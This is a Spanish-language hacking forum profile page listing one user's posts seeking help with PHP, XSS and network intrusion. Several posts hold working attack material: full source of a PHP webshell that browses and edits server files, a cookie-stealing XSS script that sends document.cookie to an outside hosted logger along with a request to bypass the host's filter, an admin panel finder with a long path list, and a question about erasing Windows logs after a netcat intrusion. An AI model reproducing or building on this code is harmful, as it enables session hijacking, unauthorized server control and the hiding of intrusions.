Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Dr [F]

Páginas1
#1
PHP / Ayuda con base de datos
21 Junio 2011, 02:09 AM
hola foro, les vengo con una consulta, estoy intentando montar un sistema de puntos en mi web, esta consta con una base de datos llamada muro, aca les dejo el code (Mysql)

Código
Código (sql) [Seleccionar]
CREATE TABLE muro(
id int UNSIGNED,
usuario varchar(30) NOT NULL,
post varchar(255) NOT NULL,
fecha datetime UNSIGNED,
megusta int UNSIGNED,
PRIMARY KEY(id)
);


y el code problematico es este


Código
Código (php) [Seleccionar]
<?php
 
$text $_REQUEST['publicar'];
$replace '@(<script>| onload | onerror | )@';
include("Consultas/conectar.php");
$url_actual "http://" $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"];
if($url_actual=="http://localhost/UPLOAD/menu.php") {
 
$quer mysql_query("SELECT id,usuario,post,fecha from muro order by id desc",$conexion);
while($querr mysql_fetch_array($quer)) {
$numero strlen($querr['usuario']);
 
echo "<br><div id=down>";
 
echo "<img src=imagenes/imagendefault.png></img>";
echo  "<a href=http://localhost/UPLOAD/perfiles/$querr[usuario].php>";
echo "&nbsp;";
echo $querr['usuario'].":";
echo "<br></a>";
for($i=0;$i<$numero;$i++) {
echo "&nbsp;&nbsp;";
}
$fa $querr['post'];
$post preg_replace($replace,' ',$fa);
 
 
echo $post;
$id $querr['id'];
 
 
echo "<br><br>";
 
 echo "<div id=fan3>";
 
echo $querr['fecha'];
echo "<form method=post action=$url_actual>";
echo "<input type=submit value=+1 name=megusta>";
echo "<input type=submit value=-1 name=nomegusta>";
 
 
echo "</form>";
 
echo "<br>";
 
 
echo "</div>";
 
echo "<br><hr>";
 
}
}
if(isset($_REQUEST['megusta'])) {
mysql_query("UPDATE muro set megusta=23 where id=$id",$conexion);
}

el problema es que siempre me inserta el valor de me gusta en id=1 de la tabla... alguien sabe que estoy haciendo mal ? muchas gracias
#2
Seguridad / Informatica forense + ayuda rifiuti
6 Agosto 2010, 11:13 AM
Hola a todo el foro de seguridad  ;D, les traigo una pregunta  :-[
estaba siguiendo el tutorial que hay en esta comunidad de Informatica forense

http://www.elhacker.net/InfoForenseWindows2.html

Despues de haber bajado el programa rifiuti.exe
intento acceder a la ruta donde se encuentra info2

que supuestamente seria aca:

Citarc:\recycler\S-1-5-21-27800051451-1340124367-2516573698-1128

y me responde que no se puede encontrar la ruta :S

alguien sabe a que se debe esto ?

muchas gracias :)  ;D
#3
PHP / problema en codigo :(
1 Agosto 2010, 06:24 AM
Hola gente, estoy realizando una webshell y me surgio un problema, la webshell la pantalla principal consta de un menu para ver archivos info del servidor y creditos

bueno el problema es que cuando voy a la parte de de informacion del servidor se mete tambien lo que hay en menu :(
lo mejor va a ser que lo vean..
les dejo el codigo

Código (php) [Seleccionar]
<html>
<head>
<title> K0D4K Sh3LL! </title>
<style type="text/css">
body {
background-color:#000000;
cursor:crosshair;

font-family:monospace;
}

datitos{
color:FF0000;
font-weight:bold;
font-family:verdana;
font-size:15px;
}

carteles {
font-size:20px;
color:#FF8000;
font-weight:bold;
}

directorios{
font-size:small;
font-type:Comic Sans Ms;
font-color:red;
font-family:verdana;
font-weight:bold;
}

table
{
font-size:13px;
  border-collapse: collapse;
}

th
{
  border-right: 1px solid #000;
  border-bottom: 1px solid #000;
  padding: 0.5em;
  background-color:#FF8000;
}

corchetes {
color:#FF0000;
font-family:verdana;
font-size:26px;
font-weight:bold;
font-style:italic;
}

signos {
font-weight:bold;
color:#FF8000;
font-size:24px;
}

k{
color:#FF0000;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}

cero{
color:#FF8000;
font-size:23px;
font-size:25px;
font-weight:bold;
font-style:italic;
font-family:verdana;
}

guion{
color:#FF8000;
font-size:25px;
}


a:link {
font-size:15px;
color:red;
text-decoration:none;
}
a:visited{
color:red;
text-decoration:none;
}
a:hover {
cursor:crosshair;
color:orange;
text-decoration:none;
font-size:16px;
}

datos{
font-size:medium;
color:#FF8000;
font-family:verdana;
}


</style>
<title> K0D4K Web Sh3LL! </title>
</head>
<body>
<center>
<corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes>
<k> K</k> <cero>0</cero> <k>D</k> <cero>4</cero> <k>K</k>   <guion>-</guion>   <k>S</k> <cero>H</cero> <k>3</k> <cero>L</cero> <k>L</k> <corchetes>[</corchetes><signos>!</signos><corchetes>]</corchetes></center>
  <br><br>     <center>
 
    <center>     <br><br>
<div style="bottom: 50%%; width: 60%; left: 23%; right: 7%; top: 28%;
visibility: visible; z-index:10; font-family: Courier New; background-color: #000000;border:1.5px orange dashed; text-decoration: none; text-aling: center;">

<center>         <br>

<a href="?shell=archivo"> Ver Archivos </a><br>
<a href="?shell=datos"> Informacion Del Servidor </a><br>
<a href="?shell=phpinfo"> Link3</a>  <br>
<a href="?shell=creditos">Creditos</a>     <br>


</div></center></center>
<br>

<?php



if(isset($_GET['path'])) {
$path $_GET['path'];
$dir dir($path);
}
else {
$path getcwd();
$dir dir($path);
}
if($_GET['shell'] == "archivo" or $_GET['path']!== "") {

echo "<br>";
 echo "<div align=right>";
echo "<table><tr>";
echo "<th>Posicion:</th><th>";
echo "$path";
echo "</th>";
echo "</table>";
echo "</div>";
echo "</chica>";
echo "<br>";

           echo "<center>";
echo "<carteles><br>";
echo "Directorios:<br>";
"</carteles>";
$contador 0;
while ($file $dir->read()) {
$extension filetype($path."/".$file);
if ($extension == "dir") {
$contador+=1;
$ruta urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?path=".$ruta.">".$file."</a><br>";
}
}
echo "</directorios>";

echo "<br><br><carteles>";
echo "Archivos:";
echo "</carteles><br>";
$dir->rewind();
$contador=0;
while($file $dir->read()) {
$extension=filetype($path."/".$file);
if ($extension !=="dir") {
$contador+=1;
$ruta=urlencode($path."/".$file);
echo "<directorios>";
echo "<a href=?view=".$ruta.">".$file."</a><br>";}}
if ($contador==0) {
echo "No hay archivos en el directorio";
}
echo "<br><br>";
echo "</center>";
$dir->close();
echo "</directorios>";


if(isset($_GET['view'])) {
$ruta $_GET['view'];
echo "<h2><font color=orange><center>";
echo "Editando: $ruta";
echo "</font></center></h2>";
echo "<center>";
echo "<form method=POST action=\"\">";

echo "<div style=133%><textarea name=\"modi\" cols=35 rows=15>";
$abrir=fopen($ruta,"r");
$texto fread($abrirfilesize($ruta));
echo htmlentities($texto);
echo "</textarea></div>";

echo "<input type=submit name=\"Change\" value=\"Editar\">";
echo "</form>";
echo "</center>";
if(isset($_POST['Change'])) {
$arc=fopen($ruta"w+");
$txt=$_POST['modi'];
@$ok fwrite($arc,$txt);
}
}
}
?>
<?php
if($_GET['shell']=="datos") {
echo "<br><br><br>";
$servers=$_SERVER['SERVER_SOFTWARE'];
$ipserver=$_SERVER['SERVER_ADDR'];
$lugarshell=$_SERVER['SCRIPT_FILENAME'];
echo "<carteles>";
echo "Datos del servidor:";
echo "</carteles>";

echo "<br><br><br>";
echo "<datos>";
echo "Version de software: ";
echo "</datos>";
echo "<datitos>";
echo $servers;
echo "</datitos>";
echo "</info>";
echo "<br>";
echo "<datos>";
echo "IP del servidor: ";
echo "</datos>";
echo "<datitos>";
echo $ipserver;
echo "</datitos>";
echo "<br>";
echo "<datos>";
echo "Directorio shell: ";
echo "</datos>";
echo "<datitos>";
echo $lugarshell;
echo "</datitos>";
}
?>
<?php
if($_GET['shell'] == "creditos") {
header("location: http://www.kodakwebshell.blogspot.com/search/labels/creditos");

}
?>
</body>
</html>

muchas gracias
#4
Nivel Web / Problema con añadimiento en codigo
29 Julio 2010, 04:42 AM
Hola gente miren estaba montando un servidor de pruebas y lo subi a mi@

los codigos son los siguientes:

webv.php

Código [Seleccionar]
<?php
session_start();
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Bienvenidos a XSS testing</title>
</head>
   
<body><center>
<h1><font color=red>XSS Testing</font></h1></center>
<div align=center>
<form method="post" action="busca.php" >
<input type="text" name="busca" value="Buscador Vulnerable" maxlength="222">
<input type="submit" value="buscar">
</form>
</div>
<br><br><br>
<form method="post" action="pag2.php">
<font color=red>Ingrese su usuario:    <input type="text" name="nombre">
<br>
Ingrese su contraseña: </font><input type="password" name="password">
<br>
<input type="submit" value="enviar">
</form>
</body>
</html>

busca.php

Código [Seleccionar]
<?php
$bus $_REQUEST['busca'];

echo ($bus);
?>

pag2.php

Código [Seleccionar]
<?php
$user=$_POST['nombre'];
$pass $_POST['password'];
if ($user == "franco"  && $pass == "franco")
{
setcookie("senia"$user."-"$passtime()+60*60*24*365"/");
echo "Bienvenido $user";
}
else
{
echo "usuario o contraseña incorrcto:";
}
?>

cookie.js

Código [Seleccionar]
document.write("<iframe width='0' height='0' src='http://www.pruebas18p.webcindario.com/cookie.php?c="+document.cookie+"'></iframe>");

cookie.php

Código [Seleccionar]
<?php
$cookie=$_GET['c'];
$file=fopen('archivo.txt''a');
fwrite($file$cookie.' - ');
fclose($file);
?>


esta es la url vulnerable a nivel localhost:

http://localhost/busca.php?busca=<script src="http://localhost/cookie.js"</script>

El codigo que interpretaria busca.php seria <script src="Http://localhost/cookie.js"</script>

pero mi@ es el siguiente

Código [Seleccionar]
<script src=\"http://www.pruebas18p.webcindario.com/cookie.js\"</script>
<!-- Inserted by miarroba -->
<script type="text/javascript" src="http://weborama.miarroba.info/?d=hosting&amp;h=pruebas18p.webcindario.com&amp;t=1280371273&amp;k=5c4e108c6ef14544954ee758c7790aa0"></script>
<!-- Inserted by miarroba -->




Bueno a nivel localhost no hay problema, puedo obtener tranquilamente las cookies, pero en mi arroba no se puede ejecutar el script

alguien sabe alguna forma de bypassear ese filtro que tiene mi arroba ?

gracias :)


#5
Nivel Web / duda xss
24 Julio 2010, 08:55 AM
Hola gente del foro, estaba en casa intentando practicar xss leyendo tutoriales, pero no me sale :S

miren hize unas paginas vulnerables, pero me sigue sin salir:

pagina: pindex.php

Código [Seleccionar]
<?php
if(isset($_COOKIE['user'])) echo $_COOKIE['user'];
?>
<html>
<head>
</head>
<body>
<form method="post" action="buscador.php">
<input type="text" name="palabrita">
<br>
<input type="submit" value="enviar"></form>
</body>
</html>

buscador.php

Código [Seleccionar]
<?php
$user $_REQUEST['palabrita'];
setcookie("user"$usertime()+(60*60*24*365),"/");
?>
<html>
<head></head>
<body>
<a href="indexxx.php"> Pagina 1</a>
</body>
</html>

cookies.php

Código [Seleccionar]
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, $cookie);
fclose($fff);
?>

y esta es la url que mando:

Código [Seleccionar]
http://localhost/buscador.php?palabrita=
<script>window.location='http://localhost/cookies.php?cookie='+document.cookie;</script>&enviar=;

el problema es que no me crea el archivo archivo.txt :S

alguien sabe a que se debe.. ? gracias
#6
PHP / duda con directorios
22 Julio 2010, 07:59 AM
Hola gente :) soy yo, con otra de mis dudas :(

En esta oportunidad las dudas saltaron trabajando con directorios... miren aca les dejo un codigo:

Código (php) [Seleccionar]
<?php
$dir ="/";
$directorio=opendir($dir); 

while($archivo=readdir($directorio))
{

echo $archivo;
echo date ("F d Y H:i:s."filemtime($nombre_archivo));

echo "<br>";
}
closedir($directorio); 
?>


Basicamente, no se como hacer para que me de la fecha de la ultima modificaciion ya que me tira error :s, busque por todas partes y no encontre nada :S

¿Que tengo mal?

Muchas gracias a todos :)

#7
PHP / duda con panel finder
20 Julio 2010, 22:14 PM
hola gente :) soy nuevo en esta sección.. antes que nada gracias por todo :)
el foro esta estuppendo..

bueno voy a mi pregunta

estaba realizando un admin panel finder en php, pero no logro conseguir lo que busco, miren les dejo el codigo

consta de 2 paginas indexx.html y adminp.php

indexx.html:

Código (html4strict) [Seleccionar]
<html>
<head><title>Admin Panel Finder 0.88</title></head>
<body>
<form method="post" action="adminp.php">
Ingrese la web:
<input type="text" name="web" value="http://" size="30">
<br><br>
<input type="submit" value="probar">
</form>
</body>
</html>


adminp.php:

Código (php) [Seleccionar]
<?php
$pagina=$_REQUEST['web'];
function comprobar($url)
{
$fp=@fopen($url,"r");
if($fp){
return true;
}
else
{
return false;
}
@fclose ($fp);
}


$array = array(
 "admin1.php""admin1.html""admin2.php""admin2.html""yonetim.php""yonetim.html""yonetici.php""yonetici.html""ccms/""ccms/login.php""ccms/index.php",
"maintenance/""webmaster/""adm/""configuration/""configure/""websvn/""admin/""admin/account.php""admin/account.html""admin/index.php""admin/index.html""admin/login.php""admin/login.html""admin/home.php""admin/controlpanel.html""admin/controlpanel.php""admin.php""admin.html""admin/cp.php""admin/cp.html",
"cp.php""cp.html""administrator/""administrator/index.html""administrator/index.php""administrator/login.html""administrator/login.php""administrator/account.html""administrator/account.php""administrator.php""administrator.html""login.php""login.html""modelsearch/login.php""moderator.php""moderator.html""moderator/login.php""moderator/login.html""moderator/admin.php""moderator/admin.html""moderator/""account.php""account.html""controlpanel/""controlpanel.php""controlpanel.html""admincontrol.php""admincontrol.html""adminpanel.php""adminpanel.html""admin1.asp""admin2.asp""yonetim.asp""yonetici.asp""admin/account.asp""admin/index.asp""admin/login.asp""admin/home.asp""admin/controlpanel.asp""admin.asp""admin/cp.asp""cp.asp""administrator/index.asp""administrator/login.asp""administrator/account.asp""administrator.asp""login.asp""modelsearch/login.asp""moderator.asp""moderator/login.asp""moderator/admin.asp""account.asp""controlpanel.asp""admincontrol.asp""adminpanel.asp""fileadmin/""fileadmin.php""fileadmin.asp""fileadmin.html""administration/""administration.php""administration.html""sysadmin.php""sysadmin.html""phpmyadmin/""myadmin/""sysadmin.asp""sysadmin/""ur-admin.asp""ur-admin.php""ur-admin.html""ur-admin/""Server.php""Server.html""Server.asp""Server/""wp-admin/""administr8.php""administr8.html""administr8/""administr8.asp""webadmin/""webadmin.php""webadmin.asp""webadmin.html""administratie/""admins/""admins.php""admins.asp""admins.html""administrivia/""Database_Administration/""WebAdmin/""useradmin/""sysadmins/""admin1/""system-administration/""administrators/""pgadmin/""directadmin/""staradmin/""ServerAdministrator/""SysAdmin/""administer/""LiveUser_Admin/""sys-admin/""typo3/""panel/""cpanel/""cPanel/""cpanel_file/""platz_login/""rcLogin/""blogindex/""formslogin/""autologin/""support_login/""meta_login/""manuallogin/""simpleLogin/""loginflat/""utility_login/""showlogin/""memlogin/""members/""login-redirect/""sub-login/""wp-login/""login1/""dir-login/""login_db/""xlogin/""smblogin/""customer_login/""UserLogin/""login-us/""acct_login/""admin_area/""bigadmin/""project-admins/""phppgadmin/""pureadmin/""sql-admin/""radmind/""openvpnadmin/""wizmysqladmin/""vadmind/""ezsqliteadmin/""hpwebjetadmin/""newsadmin/""adminpro/""Lotus_Domino_Admin/""bbadmin/""vmailadmin/""Indy_admin/""ccp14admin/""irc-macadmin/""banneradmin/""sshadmin/""phpldapadmin/""macadmin/""administratoraccounts/""admin4_account/""admin4_colon/""radmind-1/""Super-Admin/""AdminTools/""cmsadmin/""SysAdmin2/""globes_admin/""cadmins/""phpSQLiteAdmin/""navSiteAdmin/""server_admin_small/","logo_sysadmin/""server/""database_administration/""power_user/""system_administration/""ss_vms_admin_sm/"
);

for ($i 0$i count($array); $i++)
{
$existecomprobar($pagina,"/",$array[$i]);
if ($existe)
{
echo "existe";
echo "<br>";
}
else
{
echo "no existe";
echo "<br>";
}}

?>

bueno el problema es que en vez de ponerme una vez existe lo hace muchas veces.

creo que lo mejor va a ser que lo prueben uds para ver cual es el error..

muchas gracias :)
#8
Hacking / netcat.. ayuda
25 Marzo 2010, 00:16 AM
Hola, tengo varias dudas respecto a netcat:

1) Alguien sabria borrar los logs que se dejan cuando ingresar a la pc ? en windows ?

2) Que mas se puede hacer ? es decir, yo solo vago por directorios mirando archivos, alguien tiene un tuto de como subir y bajar archivos...

Muchas gracias
#9
Hacking / Duda con envenamiento ARP
22 Marzo 2010, 10:17 AM
Hola gente del foro :D
antes que nada muchas gracias por leer mi problema es el siguiente, leyendo este tutorial:

http://foro.elhacker.net/hacking_avanzado/taller_practico_de_intrusion_en_redes_locales-t45618.0.html

Me situo en la consola MS-DOS

y coloco arp -a

en ese instante me sale la IP del router y su direccion MAC., pero no me sale la Ip y MAC de mi ordenador....

pd: En la direccion los datos de mi router dice:

direccion IP                Direccion MAC                 Tipo

192.168.0.1                  xxxx-xxx-xx                 variado


Muchas gracias a todos :D
Páginas1